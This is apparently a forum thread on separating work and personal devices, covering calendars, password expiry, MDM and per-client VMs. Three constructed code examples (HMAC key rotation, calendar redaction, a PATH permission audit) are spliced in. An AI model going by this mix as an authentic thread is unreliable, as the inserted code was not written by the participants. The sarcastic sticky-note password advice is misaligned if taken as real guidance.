I got a new job recently after being at my old place almost 15 years. I've decided I'm doing things differently this time. All my work stuff is on my work equipment, all my personal on my personal, and never the two shall meet. I don't have e-mail or slack on my phone. I don't have personal e-mail on my work computer.
It's remarkable to me how much this has improved my life. It took some getting used to, but when I'm working I focus better on work, and when I'm not I unplug. It seems obvious yet somehow leaving work behind at the end of the day escaped me before.
Also, as someone who used to run an IT department, it's shocking the degree to which some people fail to realize their work equipment is, well, work's. Personal e-mail on your work laptop, I get it. Your entire collection of photography celebrating the human form in your folder on the company shared drive, why would anyone think that's a good idea?
Calendar is what kills this approach for me. I am not two different people with two different calendars, I am one person with one calendar. Scheduling & making all my appointments is really troublesome with two separate calendars.
They usually have extreme security guidelines for employees. All external laptop ports disabled, so no way to plug in peripherals or connect a TV for a presentation.
No internet access at all on laptops, or only with a SIM card which only allows connections to the VPN bastion host etc. Direct Internet on premise is a no-go as well, obviously. So no checking Stack Overflow if you've got any issues.
They still leave infrastructure with default passwords exposed to the internet and implement questionable password policies for their customers... But they do everything they can in order to sabotage their employees!
That's a good description. They invest a lot in highly secure technology and processes, and then ignore them out of convenience.
I work at a department that's all about data quality and integrity, and we have super bureaucratic processes to regulate access to data, but you don't want to know how much data lives in Excel files; an issue I'm constantly trying to address.
> with a few minutes of delay between Google and Office365 calendars
How in the world do you do that? Subscribe to Calendar isn't even possible with Office 365, right? You have to use From URL, to which you give the .ics URL, which Google Calendar normally pulls a couple times a day. Is there a different mechanism you use?
We should discourage this stupidity of expiring passwords wherever we can.
Maybe make it a point to put your passwords on a sticky note stuck on the monitor prominently on display if $work requires you to change passwords that frequently?
Nobody actually cares about the security of expiring passwords, it's just a line item on a checklist of official processes. And the people auditing it don't visit in person
“Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator.”
Users tend to choose weaker memorized secrets when they know that they will have to change them in the near future. When those changes do occur, they often select a secret that is similar to their old memorized secret by applying a set of common transformations such as increasing a number in the password. This practice provides a false sense of security if any of the previous secrets has been compromised since attackers can apply these same common transformations. But if there is evidence that the memorized secret has been compromised, such as by a breach of the verifier’s hashed password database or observed fraudulent activity, subscribers should be required to change their memorized secrets. However, this event-based change should occur rarely, so that they are less motivated to choose a weak secret with the knowledge that it will only be used for a limited period of time.
Both NIST and NCSC now actively discourage password expiration. And it took them only what, 30 years, to catch up with real-world best practices?
That said, there is a place for 30-day rotation. That's when the so-called "password" is actually a shared secret for extremely high-value systems. Payment gateways, for example.
> That said, there is a place for 30-day rotation. That's when the so-called "password" is actually a shared secret for extremely high-value systems. Payment gateways, for example.
Should we even attempt to let the user define such shared secrets? If 30-day rotation is good, surely 30 second rotation is better? Perhaps we can replace such "passwords" with some kind of one time PIN (OTP) or some generated pass phrase only valid for n minutes?
Well, in this shared-secret case we're talking about "symmetric signing keys" (really: MAC keys). Those types of keys are not defined by the users, they are issued by the party you're connecting to and delivered over a known, reasonably secure out-of-band mechanism.
I am all for having transient secrets, but without an extremely well integrated and robust vault they would be unmanageable. Plus asymmetric handshakes are computationally really expensive, so you don't do them all the time.[ß] The 30-day rotation period for these types of secrets is merely a reasonable compromise between "assume all shared secrets will be compromised" and the human factor.
ß: a friend set up a dedicated payment gateway device for a UK challenger bank. For just one card issuer. That thing can supposedly run at 10Gb line rate, so doing asymmetric crypto frequently would murder performance and latency.
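Added example, not code from the thread: request signing with a shared HMAC key of the kind the two comments above describe, issued by the gateway and delivered out-of-band. A key id travels with every message, each key is valid for one rotation period plus a short overlap so both sides can roll over without an outage, and a key can be revoked on the spot when there is evidence of compromise instead of waiting for the next rotation. The 30-day cadence, the overlap window, the key ids and the sample secrets are illustrative assumptions, and one `KeyRing` object stands in for the copies the issuer and verifier would each hold.

```python
"""Added example (not from the thread): shared MAC keys with key ids,
a rotation period, an overlap window and on-demand revocation.
Cadence, overlap and sample keys are assumptions."""

import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

DAY = 86400
ROTATION_DAYS = 30          # assumption: the 30-day cadence discussed above
OVERLAP_SECONDS = 2 * 3600  # assumption: old key accepted 2h past rollover


@dataclass
class SharedKey:
    kid: str          # key id sent in the clear with every message
    secret: bytes     # 32 random bytes, never something a human chose
    not_before: int   # unix seconds
    not_after: int
    revoked: bool = False


class KeyRing:
    """Held by both sides: the issuer mints keys, the verifier looks them up."""

    def __init__(self) -> None:
        self._keys: Dict[str, SharedKey] = {}

    def issue(self, kid: str, now: int, secret: Optional[bytes] = None) -> SharedKey:
        # Valid for one period plus the overlap, so the key minted at the
        # next rollover overlaps this one for OVERLAP_SECONDS.
        key = SharedKey(
            kid=kid,
            secret=secret if secret is not None else secrets.token_bytes(32),
            not_before=now,
            not_after=now + ROTATION_DAYS * DAY + OVERLAP_SECONDS,
        )
        self._keys[kid] = key
        return key

    def revoke(self, kid: str) -> None:
        """Evidence of compromise: stop accepting the key now, not at expiry."""
        self._keys[kid].revoked = True

    def usable(self, kid: str, now: int) -> Optional[SharedKey]:
        key = self._keys.get(kid)
        if key is None or key.revoked:
            return None
        if not (key.not_before <= now < key.not_after):
            return None
        return key


def sign(key: SharedKey, timestamp: int, body: bytes) -> str:
    """Bind the kid and the timestamp into the MAC so neither can be swapped."""
    msg = b"|".join([key.kid.encode(), str(timestamp).encode(), body])
    return hmac.new(key.secret, msg, hashlib.sha256).hexdigest()


def verify(ring: KeyRing, kid: str, timestamp: int, body: bytes,
           tag: str, now: int, max_skew: int = 300) -> bool:
    """Reject unknown, expired or revoked keys and stale timestamps (replay
    window), then compare the tag in constant time."""
    key = ring.usable(kid, now)
    if key is None or abs(now - timestamp) > max_skew:
        return False
    return hmac.compare_digest(sign(key, timestamp, body), tag)
```

During the overlap the verifier accepts both kids, which is what lets the client switch to the new key whenever it receives it; logging which kid each request used shows you who has not rolled over before the old key expires.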
I've been confronted with exactly this a short while ago, and even produced Microsoft's official stance on this (against). But in the end, their argument really boiled down to "but my checklist says so".
Microsoft's [0] first entry of "Common approaches and their negative impacts". With a reference to the FTC website. [1]
This is so infuriating. NIST has been advising against it for years by now and even Microsoft switched the official stance last year or so, but it still keeps being done out of inertia. It's also still in the AWS best practices (I unsuccessfully tried to argue against introducing it for our accounts).
Though, to be honest, at this point I believe that humanity should just abandon passwords for all but the most unimportant of things (e.g. your account on some hobbyist forum), at this point they just have too many downsides and most people seem to be unable to handle them properly.
> Anything outside work hours doesn't need to be on a calendar.
I'm happy that works for you, but for me or anyone else who can be absent minded sometimes, that does. not. work. I need a calendar to remember promises I've made to people about when and where I'll be. Tuesday I'm meeting a friend to catch up in person, Thursday I've got a birthday dinner to go to, there's a show on Friday that I have tickets to. Stack multiple events in a single night if you have a busy social life. That's not a ton of information to remember but human memory is imperfect, and that sort of information is in one ear and out the other for me.
Prior to pocket computers, I'd have a paper datebook to carry around (and lose), but thanks to modern technology, it's stored in the cloud and accessible for me at https://calendar.google.com.
> Anything outside work hours doesn't need to be on a calendar.
Can't edit original, but what I meant there is that it doesn't need to be on a calendar that work has access to (if the event is outside working hours).
For things on weekends I put those on my personal calendar. But that's clear-cut separation since no work event will ever be there.
The conflict is only for personal events during work hours. For those I put the blank placeholder in work calendar to block out the time.
But you need to check both calendars when making the appointment. I can see how that's cumbersome, and in fact is one thing I deal with as well.
It would be nice if I could sync my work calendar with my personal calendar, but with all details redacted except for begin, end, and perhaps location.
Depending on your software, you can! I know Google Calendar allows you to restrict shared calendars to just time ranges, it'll show up as "not available".
Settings > Calendar Settings > Access Permissions > Make Available to Public > on the dropdown, pick "See only free/busy". Now you can share the link with your work calendar and it'll show up as indistinct blocks of time.
You can do it both ways, and you'll be able to check your availability for both work-related things and personal things in their own calendar, but contextualized.
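Google's free/busy sharing, as described above, does this for you. The following is an added example, not code from the thread, for the case where you want to build the redacted feed yourself (begin, end, and optionally location, as asked for a few comments up) from an .ics file your calendar exports. The property list it keeps and the sample feed are constructed here; one detail worth noticing is that RFC 5545 folds long lines, so a DESCRIPTION has to be unfolded before it is dropped or its continuation lines leak through.

```python
"""Added example (not from the thread): reduce an iCalendar feed to
free/busy blocks. Every VEVENT keeps its timing and UID, SUMMARY becomes
"Busy", and everything else is dropped. Sample feed is constructed."""

from typing import List

# Properties that carry only scheduling information; safe to pass through.
_KEEP = {"BEGIN", "END", "UID", "DTSTART", "DTEND", "DURATION", "DTSTAMP",
         "RRULE", "EXDATE", "RDATE", "TRANSP", "SEQUENCE", "RECURRENCE-ID"}


def _unfold(text: str) -> List[str]:
    """RFC 5545 line unfolding: a line starting with a space or tab
    continues the previous line."""
    lines: List[str] = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw.startswith((" ", "\t")) and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def _name(line: str) -> str:
    # "DTSTART;TZID=Europe/Berlin:20240102T100000" -> "DTSTART"
    return line.split(":", 1)[0].split(";", 1)[0].upper()


def redact_to_free_busy(ics: str, keep_location: bool = False) -> str:
    out: List[str] = []
    in_event = in_alarm = False
    for line in _unfold(ics):
        upper = line.upper()
        if upper == "BEGIN:VEVENT":
            in_event = True
            out.append(line)
            continue
        if upper == "END:VEVENT":
            in_event = False
            out.append(line)
            continue
        if not in_event:
            out.append(line)  # VCALENDAR / VTIMEZONE wrapper stays intact
            continue
        # VALARM blocks usually repeat the reminder text; drop them whole.
        if upper == "BEGIN:VALARM":
            in_alarm = True
            continue
        if upper == "END:VALARM":
            in_alarm = False
            continue
        if in_alarm:
            continue
        name = _name(line)
        if name == "SUMMARY":
            out.append("SUMMARY:Busy")
        elif name in _KEEP or (keep_location and name == "LOCATION"):
            out.append(line)
        # DESCRIPTION, ATTENDEE, ORGANIZER, URL, ATTACH, X-* ... are dropped
    return "\r\n".join(out) + "\r\n"


# Constructed sample feed (not real data); note the folded DESCRIPTION.
SAMPLE_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//Example//EN",
    "BEGIN:VEVENT",
    "UID:123@example.invalid",
    "DTSTAMP:20240101T090000Z",
    "DTSTART;TZID=Europe/Berlin:20240102T100000",
    "DTEND;TZID=Europe/Berlin:20240102T110000",
    "SUMMARY:Dentist appointment",
    "LOCATION:Main St 1",
    "DESCRIPTION:root canal\\, second",
    "  attempt",
    "ATTENDEE;CN=Dr. Who:mailto:who@example.invalid",
    "BEGIN:VALARM",
    "ACTION:DISPLAY",
    "DESCRIPTION:Dentist reminder",
    "TRIGGER:-PT15M",
    "END:VALARM",
    "END:VEVENT",
    "END:VCALENDAR",
])

if __name__ == "__main__":
    print(redact_to_free_busy(SAMPLE_ICS))
```

Calendar-level properties such as X-WR-CALNAME pass through unchanged, so rename the calendar before exporting if its title itself says more than you want the other side to see.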
Even my work calendar doesn't share the details of what I'm doing in a busy slot. Not particularly something anyone needs to know. If someone really needs to meet and my calendar looks blocked they can ping me to see if there's anything I can drop or move. It's not really up to them to make the decision (unless I work for them and it's urgent).
By default, my work calendar is strictly work and my personal calendar is strictly personal. I only duplicate personal events to my work calendar if they overlap with my work hours. Everything outside of work hours goes in my personal calendar only.
Aside from the odd appointment at the dentist or doctor's office, I don't have very many appointments that need to show up in both calendars. Work hours are work, everything else is personal and none of my workplace's business.
For those rare cases, it really isn't a problem to look at my work calendar on the work PC and my personal calendar on my phone and do a quick comparison.
In general, if I have a personal appointment, I'm not going to forget about it. Just the act of having added it to my calendar is enough to remember it, without having to look at the calendar. I only ever mix personal events into my work calendar if there is an overlap with my working hours; everything else is none of my workplace's business, and I'll politely decline any meeting that conflicts.
Besides, last-minute meetings are a sign of bad meeting culture.
This is one place where you can, maybe, shed a tear for management. Imagine your CEO keeping a separate calendar. Don’t you want them inviting investors over for dinner?
With google calendar, you can add your private calendar (via a sharable url) and set it up such that it marks your private events as busy. Very useful.
The only time this bit me so far is that once I had a weekly recurring for…two years. And one day, for some reason, my phone started RSVPing to it again. Except it was every instance of it that had passed…blew up my boss's inbox and made my phone useless for about an hour. It was the weirdest thing. Funny though.
I believe that was an iOS bug, I remember hearing about that in a few instances where the built-in calendar client was connected to Office 365. In all cases it was solved by updating iOS to some bug-fixing point release.
I do this while freelancing/contracting as well. I have a macbook for client work only.
While I don't have one for each potential client, I do use a different user for each client, and all data should remain in user space -- which is easy enough to accomplish since I need to maintain matching versions of databases anyway; there is no need to share a single data store.
I've done this before with one VM per client. Makes archiving etc. simple also, and means that per-client setup stuff never tramples on each other.
Gives an answer for how you firewall sensitive data also, e.g. every document you gave me never existed anywhere except in this (potentially encrypted) VM. Easy to delete cleanly.
That sounds like a clean way to organize multiple clients.
For some types of development, I find working on a remote server using SSH/Mosh/tmux works really well for me. I am retired now but I used to ask clients to rent a reasonably powerful VPS that we both had access to and just worked on that. I think this gave customers good control over their property (i.e., the work I did on their behalf).
It's a great system. The only real pain I've run into with it, on macOS anyway, is that you can't isolate iCloud accounts and still receive texts on your Mac. So unless you have a separate phone for each client, that's not so great. Also, the lack of profiles on iDevices means any client-specific apps (2fa stuff, for instance, or if you like to have Slack on your iDevice, or dev/testing apps, or whatever) ends up in a shared space on there.
Right, the trouble's getting text messages and such through to your laptop (text message 2fa is so nice with a synced phone—auto fill!), if you have multiple clients. One work phone + personal phone (or tablets, or whatever) is fine. It's when you have three clients, and maybe they rotate out sometimes, that it gets to be a little annoying.
... unless you can add multiple iCloud accounts to one phone. I guess I've never tried, because I just assumed you couldn't. Though you'd still have the problem of things like dev builds and all that existing in the same space, and email accounts (on the phone) syncing to the same application without much separation, and all that.
I once worked with a guy in the early 2000s that did 1 laptop per major client project (this was local workflow type app stuff, so Windows desktop clients with maybe some kind of data backend). When he was complete, he literally took the laptop, put a label on it and put it on a shelf. He'd been burned once too many times on backwards compatibility and library quirks with Windows.
It would almost be better to have, in addition, a VM per customer, or at least some kind of encrypted partition per user/customer. Not sure how easy it is under Linux.
Another advantage of doing this on separate VMs on Qubes is it makes it easy to comply with end-of-contract requirements to destroy all data. Just delete the VMs, and if needed, old backups.
I tried to use this approach before, but if I remember correctly Homebrew didn’t like it. I like to manage my software with Homebrew, but multi user simply wasn’t working
You can install Homebrew in a non-default directory like somewhere under your home directory. It requires every package to be rebuilt during install, but it's possible. This means you should even be able to get away without even escalating your privileges to root.
How do you handle brew? It makes all the /usr/local/bin stuff belong to the regular user which installed it. Other users had trouble working with brew-installed stuff, last time I tried a few years ago.
You can install brew in your home directory using the Untar Anywhere approach. I’m particularly sceptical of how brew handles permissions, so I always install it to ~/homebrew. One thing to note: if you use this approach Homebrew will not use its precompiled binaries and will build everything from source.
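The permission concern in the last few comments has a concrete check behind it. The following is an added example, not code from the thread: it walks PATH and flags directories that another local account could write to. A Homebrew prefix owned by one user (the /usr/local layout described above) means every other account that runs brew-installed binaries is executing files that user can replace; a group- or world-writable directory on PATH widens that to the whole group or machine. The demo directories are constructed under a temporary directory, and the trust rule (root and the caller's own uid are fine, anything else is reported) is an assumption you may want to tighten.

```python
"""Added example (not from the thread): report PATH entries that someone
other than root or the current user could write to. Demo layout is
constructed; the trust rule is an assumption."""

import os
import pwd
import stat
import tempfile
from typing import List, Optional, Tuple


def owner_name(uid: int) -> str:
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def audit_path_dirs(path_value: str, me_uid: Optional[int] = None) -> List[Tuple[str, str]]:
    """Return (reason, directory) pairs for risky PATH entries. Directories
    owned by root or the caller and writable only by their owner are fine;
    entries that do not exist are skipped."""
    me_uid = os.geteuid() if me_uid is None else me_uid
    findings: List[Tuple[str, str]] = []
    for entry in path_value.split(os.pathsep):
        if not entry or not os.path.isdir(entry):
            continue
        st = os.stat(entry)  # follows symlinks: the real directory matters
        if st.st_mode & stat.S_IWOTH:
            findings.append(("world-writable", entry))
        elif st.st_uid not in (0, me_uid):
            findings.append(("owned by " + owner_name(st.st_uid), entry))
        elif st.st_mode & stat.S_IWGRP:
            findings.append(("group-writable", entry))
    return findings


def demo_path() -> Tuple[str, str, str, str]:
    """Constructed layout for the example: a world-writable bin dir, a
    group-writable one (the usual shared-admin Homebrew prefix), a sane one
    and a missing entry. Returns (path_string, open_dir, group_dir, ok_dir)."""
    base = tempfile.mkdtemp(prefix="path-audit-")
    open_dir = os.path.join(base, "open", "bin")
    group_dir = os.path.join(base, "homebrew", "bin")
    ok_dir = os.path.join(base, "ok", "bin")
    for d, mode in ((open_dir, 0o777), (group_dir, 0o775), (ok_dir, 0o755)):
        os.makedirs(d)
        os.chmod(d, mode)  # explicit, so the umask does not change the demo
    missing = os.path.join(base, "does-not-exist")
    path_string = os.pathsep.join([open_dir, group_dir, ok_dir, missing])
    return path_string, open_dir, group_dir, ok_dir


if __name__ == "__main__":
    # Audit the live PATH of whoever runs this.
    for reason, d in audit_path_dirs(os.environ.get("PATH", "")):
        print("%-16s %s" % (reason, d))
```

Installing Homebrew under ~/homebrew, as the comment above does, makes the prefix the caller's own and keeps it out of every other account's PATH, which is exactly the case this check treats as clean.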
I do the same on Linux, I install software that I always use (DBeaver, Intellij, Spotify, 1Password, browsers, postman, docker stuff, etc) with my 'personal' user and when I switch clients I just create a new user and copy over my licenses.
Then I use firefox for everything client related (their outlook, jira, etc) and just login to my gmail on chrome or brave or something.
KDE has the concept of activities (think virtual desktops on steroids, with custom widgets and look), which I used for some time to split between clients' work.
It was a fun gimmick but I can't say I missed it once I had to start using a Mac.
I did this exact same thing at my last job, and I agree that it's remarkable how much it made both work and non work life better. Drawing hard lines can oftentimes make compliance much easier. Just the fact that I had decided to not have/do ANY personal stuff on my work computer made it very easy to focus and be extremely productive. I'm in the middle of my career, and it was by far my most productive time as a software engineer.
That being said, I didn't work myself to the bone. Instead of taking breaks with reddit, checking personal email, or spending time on social networks, I allowed myself long lunches, long walks, naps in the park or at the beach, and other forms of relaxation during the working day. This easy pace allowed me to perform some of the highest quality and most creative work of my career.
I’ve known so many people that wanted to get into crypto over the last decade and didn't even own a laptop of their own and were practically married to their employer as if that was normal (in their corporate world that was normal)
They had no way of managing private keys, privately or properly at all
They did it anyway; in one instance one person turned in their computer for routine IT maintenance and it was wiped! lol! It's pretty obvious that a person like this only had a passing interest in crypto and never made any backup.
Things are so much easier now with hardware wallets that connect to iphone apps
But it's shocking how people often have no separation.
But I use my own computers for most things. If I had to use a work-issued computer for work things, I'd be more careful about commingling. (I do have a work laptop, but I don't use it for very much.) I also generally keep personal and work email separate--to the degree one can really delineate personal and work.
For me, using Facebook cookies in the same browser as work stuff blows my mind. I specifically write in the onboarding of my employees “Create a separate Chrome or FF profile to use your Facebook and other personal browsing”, and only half respect this rule, interns being specifically bad (experienced workers do want work/home isolation). They receive quite a scolding when I catch them, but the damage is done: all websites have immediately registered who they are associated with, who their colleagues are, etc.
Stringent security rules and obnoxious firewalls exist because people don’t respect cool rules.
I had a similar experience after switching companies (to remote) last year. Work computer has no personal accounts/services. iPhone (and personal Mac) has no work accounts/services. No Slack, calendars, etc. I made it clear up-front that I am not available before 8AM and after 5PM M-F, but very available during work hours. Best decision I ever made!
I try to do it. One thing that helps is my Logitech MX keys, it switches to my Phone with the push of a button, so I don't feel the need so much to install Signal and Telegram on my work laptop. (I still do of course, it's just too easy... but I try because I understand the problem.) What is nice about my employer is that they ask you to fully wipe your drives (throw away the encryption key) before handing/sending in stuff. It's as much protection for them as it is for me.
What you realize when you do that is how people actually adapt. I don't mind both; I have phases when I'll be fully plugged in and answer work email at 1am, which starts to create a super fun action-oriented life where it's a denser and denser tunnel of things to do, fix, answer.
But then when you stop (I got a Huawei phone which can't install most of the corporate things for national security reasons), then wow. When I leave, I leave: I do dilettante stuff, eat out with my wife and nobody cares. They just call someone else. I get probably fewer cookie points at annual reviews but a few rushes at the end of the year can usually compensate.
That wasn't OP's point. They meant that they don't have work e-mail or work slack on their private phone, to provide separation between work and private time.
When I have worked for similar companies, I simply didn't install any of their software on my phone. If they wanted the ability to wipe it, they would have to give me a phone for it. Sure enough, it never turned out to be that important to anyone.
Yeah, I wouldn't trust company MDM on a personal device at all. Best case is that someone with an itchy trigger finger wipes your phone. Worst case you've got someone deciding to poke around your personal device for shits and giggles.
Ironically, a week before I left one of these companies, they remotely wiped my work laptop. Someone got the memo wrong, and I spent the better part of my remaining time with them trying to get access to all the various systems so I could complete one bug ticket. I hate to imagine what would have happened if I had given them access to my personal phone.
Is it an Android? How does that work? Is it a special permission or something?
I've allowed Slack on my personal phone. It has no permissions according to the Android OS (beyond permission to use the network, which, of course, can't be denied lest Google lose ad revenue). I don't think it can wipe my phone. I hope it can't wipe my phone?
MDM is kind of a super admin feature on Android and iOS which allows for all kinds of things normal apps can never access. It's used by companies to manage company owned devices so they can do things like reset the password and remove the apple id lock when an employee leaves.
It's not that slack can wipe your phone, but that (it sounds like) slack can detect the presence of the company MDM setup which can wipe your phone and lock you out of the app if it is not detected.
Really like this approach but 7KG cabin baggage limits on lots of international flights are what makes it really hard for me. I sometimes struggle to get single laptop + iPad + charger + power bank within the limit, let alone two sets.
I always carry two laptops (personal + work) on all trips, domestic or international. Other than added inconvenience of having to take out and put back stuff during security checks, it has always worked out. Even when I end up exceeding the 7 kg limit, I've never been stopped.
I think this is reasonable advice, in some settings. But for many of us, I think it’s just not practical anymore.
The lines have become too blurred. I work from home, I have one office and one desk. The computer on the desk was purchased by my company, but other stuff wasn’t, like my mouse or my iPad. I have work Slack on my phone, which is my personal phone. I know I should be, but I’m just not that careful anymore about what I do where.
Granted, I work for a startup. It’s a MBP they had shipped directly from Apple to me. I set it up and configured it myself.
The GitHub Balanced Employee IP Agreement acknowledges that this distinction is arbitrary and unhelpful:
> In California the main difference made by BEIPA is that IP developed with company equipment or relating to the company's business, but in an employee's free time and which the employee is not involved in as an employee, is not owned by the company (but the company does get a non-exclusive and unlimited license if the IP relates to the company's business). This recognizes that from the employee perspective, segregating one's life activities based on ownership of devices at hand or relatedness to an employer's potentially vast range of business that an individual employee is not involved with as an employee imposes significant cognitive overhead and often doesn't happen in practice, whatever agreements state.
If your employer wants you to have Slack on a phone, they should buy you a phone. That’s been my situation across multiple employers for 5+ years.
I plug the same monitor and mouse into a work computer and a personal computer. This isn’t hard - you can use a single dongle with all of your inputs so you only need to swap one plug. Or you could use some kind of KVM switch.
I understand that startups may not want the expense of buying hardware for their employees, and you might not want to buy your own laptop, but if you end up building something valuable in your personal time, it’s in your interest to keep these things separate. For example, you might work on a side-project which is somehow related to your employer’s business, and eventually decide to quit and start your own company. You’ll be in a more secure legal position if you used your own device for that. You might judge that you aren’t likely to do that, but you should think through the trade-off.
The GitHub agreement sounds like an improvement, but most companies don’t use it. I’m not sure how well it protects your interests. If you’re working at odd hours because you’re receiving notifications on a personal device, while you’re also working on your side-project on a work device, would lawyers agree on what is personal and what is work?
> If your employer wants you to have Slack on a phone, they should buy you a phone. That’s been my situation across multiple employers for 5+ years.
I wholeheartedly agree with computers/systems, and keeping things separate there.. but two phones? Who wants to carry around two phones just for staying on top of slack during _off hours_?
If the company isn't ok with me using slack on my personal phone, then I'll only use slack on the supplied computer during business hours (eg. they get no mobile slack out of me at all). Either that or I find a different job. Life is too short to deal with so many devices and the hassle of it all.
I love my job and I love my life and I deliberately blend them together. This makes me substantially more productive as an employee, and incalculably happier as a human being.
If I want to see a friend in the middle of the day, I do it. If I want to take a 3 hour lunch, I do it. When someone 8 time zones away answers a question I asked earlier at my 1AM, and I’m awake and see it, I’m excited to learn the new whatever thing, and may take an hour (or three!) to chat with them about it.
Everything I do in life I have opted into and enjoy. I gain nothing by firewalling some parts of it from other parts.
I have tried every modality of managing work and personal life and this one is by far —- by far —- the best one for me. The notion that there is a work laptop and a personal laptop and ne'er the twain shall meet is a complete anachronism. It’s fine if that separation helps other people but it actively hurts me.
> The notion that there is a work laptop and a personal laptop and ne'er the twain shall meet is a complete anachronism. It’s fine if that separation helps other people but it actively hurts me.
Wow.. All I can suggest is think through the consequences. Unless you work for yourself or a very tiny startup, your employer is monitoring everything you do and store on the work computer.
You may also get cut off at any moment with zero notice if there are layoffs. If you had any personal content there, you've lost it.
Also, depending on where you live, it can mean the company now has a strong ownership claim to anything and everything you do in side projects, since it is being done on company equipment.
I work for a large company, I have a desktop machine, I fail to see how the company would have access to it (assuming they aren’t using any zero day exploits etc to attack it). They don’t have my private ssh key so can’t ssh in, it sits on my desk at home so they have no physical access. It came straight from the factory and I installed vanilla Ubuntu on it.
> on a personal MacBook and no one is monitoring everything I do
Well you said personal MacBook, this topic is about work laptop or phone.
These days (sadly) for any non-small company, all work computers and phones have remote control spyware. If you think that's not the case in your large company, you're probably wrong.
At a recent medium size engineering company, I was constantly surprised how even extremely technical engineers in the company didn't realize all the company spyware that is running on their laptop.
The standard Linux laptops people are given are fully company-managed. But many people, including myself, reload them with a distribution we manage ourselves.
I do have MDM on my personal iPhone but that seemed like a reasonable tradeoff in order to easily access work email and files on my phone.
For some odd reason, I instantly thought of Foucault's idea of biopower[1][2] after reading your comment as a possible counterpoint, despite not being well-versed in the subject.
Having a work phone that you cannot be reached on outside of standard work hours kind of defeats the purpose right? At least that is the sole reason I can think of that I would need a work phone in the first place.
The purpose of a work phone is to carry it during the specifically agreed upon period that you are actively on-call.
And you should be compensated specifically for that on call time. A standard is 1/3 of your on call time out of business hours is credited as PTO hours for 30 minute response.
Or 2/3 of your on call time out of business hours is credited as PTO hours for 5 minute response.
Why else would an employer want you to use slack on a phone? "On-Call" devops rotation or something like that?
Same rules apply even in that case. If you can't txt/page/slack me on my personal phone, then you don't get me "on-call". I'm _not_ going to carry two phones for anyone ever again (been there, done that, hated it).
> I wholeheartedly agree with computers/systems, and keeping things separate there.. but two phones? Who wants to carry around two phones just for staying on top of slack during _off hours_?
I have no issues carrying the work phone with me during the _working hours_. But off hours I just leave it next to the car keys, so I don't forget to take it with me the next morning. Just because I have a work phone that I didn't ask for doesn't mean I have to carry it with myself or even check off hours. It is useful only to have a toy to play with during the boring face-to-face meetings.
There are virtualized Android concepts out there, but I really want it to go further. I already have dual SIM in my phone, but Android has essentially no support for multiple independent copies of individual apps.
Of course, workplaces tend to insist on remote data wipe functionality and that's a big nope from the get go.
The sad thing is, Google could fix this and use their authoritative position to declare it safe: support multiple encryption keys in the secure enclave on a device, encrypt apps associated with different profiles with different keys, and allow registering "work" keys as remote wipeable. Throw in some sort of copy+paste restriction option to satisfy the pedant IT managers who think cameras aren't cheap and common.
Haven't you just described Android's existing work profile feature? It works exactly like that as far as I'm aware.
Work profile requires explicit support from your IT department, but Android also supports multiple user accounts on one device (each gets their own lock screen, home screen, app switcher, notification shade, settings, installed apps, etc), so you could segregate things that way too if you can't get your IT department to support work profile.
I feel like multiple user accounts is an underappreciated feature of Android. I just got an iPad and it's a real drag that you can only have one Apple ID logged in on it, one set of apps, one home screen, etc. Tablets are made to be shared.
>Q: Why not use Island by OasisFeng, the creator of Greenify?
>A: Simply because it is not an FOSS app and it bundles with non-free SDKs. Note that this doesn’t necessarily mean that Island has anti-features like tracking (and I don’t think it has either), it’s just that I wrote Shelter as an FOSS replacement of it. There is no other reason why one would prefer Shelter over Island except for this one.
If carrying two phones is not feasible, why would carrying two laptops be? I've done work and personal projects traveling through different countries at hotels and coffee shops pre-pandemic, and there is no way I would carry two phones OR two laptops.
Personally I like blurring the lines between work and private life. Do some personal stuff during work hours (no more messing around getting time off to go to the dentist or the bank - I just book a meeting in my calendar and go). Answer a quick question while I'm on the subway. Spend an hour at night helping out a colleague in the US with an urgent problem when I have nothing better to do anyway. I'll just sleep in in the morning when things are quiet. I love this.
What matters also is that I really like my work. And it isn't forced on me or even expected in the slightest. It's nice when I can pop in when I'm off and help out. If not it's fine too. Flexibility.
For me this works. I understand it doesn't work for many others like yourself. But that doesn't mean it should be made impossible for me (like some countries do, e.g. in France forcing work email to stop after hours).
I'm happy to see this is not just me with this perspective. Especially with WFH, I routinely work out, do groceries, go for a walk, or just read during work time (I'm self employed but the pattern has not changed at all since I left my salaried job). I make up for it by working at other times that work for me, and if e.g. I'm reading a book, I'll keep Slack on the phone so I can be available for a discussion. Most of my team at my last job was similar, usually with some set of disconnected times, e.g. for family stuff. Some would sleep in and work late, some would have supper early and put kids to bed, then work some more... I like this approach so much better than being stuck somewhere for 8 hours forced to try to be productive.
I think this mixes up two things: (1) segmentor-integrator dichotomy and (2) flexible working patterns.
For example, I am an extreme segmentor (two laptops and two phones, both of which are either off or put away in silent mode when I'm not working; zero work-related stuff on any personal devices).
At the same time, my working patterns are very flexible. I just look at my diary first thing in the morning to figure out which meetings I need to attend, and plan the rest of the day however I see fit. Going to the gym, for a run, sitting outside to read, running errands or getting a massage in the middle of the day are all completely normal.
I encourage my reports to take a similarly flexible approach to working, regardless of where they are on the segmentor-integrator spectrum (most of them are integrators).
Same. I don't overwork. Except maybe when I travel but I like travel. If I'm "off the clock" whether vacation or after 5, I'm not going to (nor be expected to) suddenly spend the rest of the night dealing with something. But maybe I can write an email or two or take a quick look at a doc which helps someone. And, as you say, I don't feel guilty going to the store or the dentist during the day.
I like working like this too - I want to be able to work when inspiration strikes, or when my customers need me, and not be forced to busywork when it's not necessary. Of course, it helps that my work is really my hobby and, to some degree, what I do for fun.
I also want to be fairly compensated, though, and if I'm lying awake at 4am solving the hard problems because I'm so engrossed in my project that I'm dreaming about it, the only really fair compensation is a percentage of the profits. So for me, since nowhere I've worked is willing to contemplate a profit-share arrangement, this kind of work only really works if I own the company.
For some of us, we kind of make up off hours as we go. If it’s 2pm and I’m bored and I have no meetings, I might just take 3 hours off and go to the park or gym, and if a coworker has a question during that time, I don’t mind answering it.
I prefer to do things whenever I want to do them and not bother with “on” and “off” hours.
Exactly. It is nice for "flex-work"--go walk the dog or run some errands or something, but still be "semi-available" for questions, but not "at the computer".
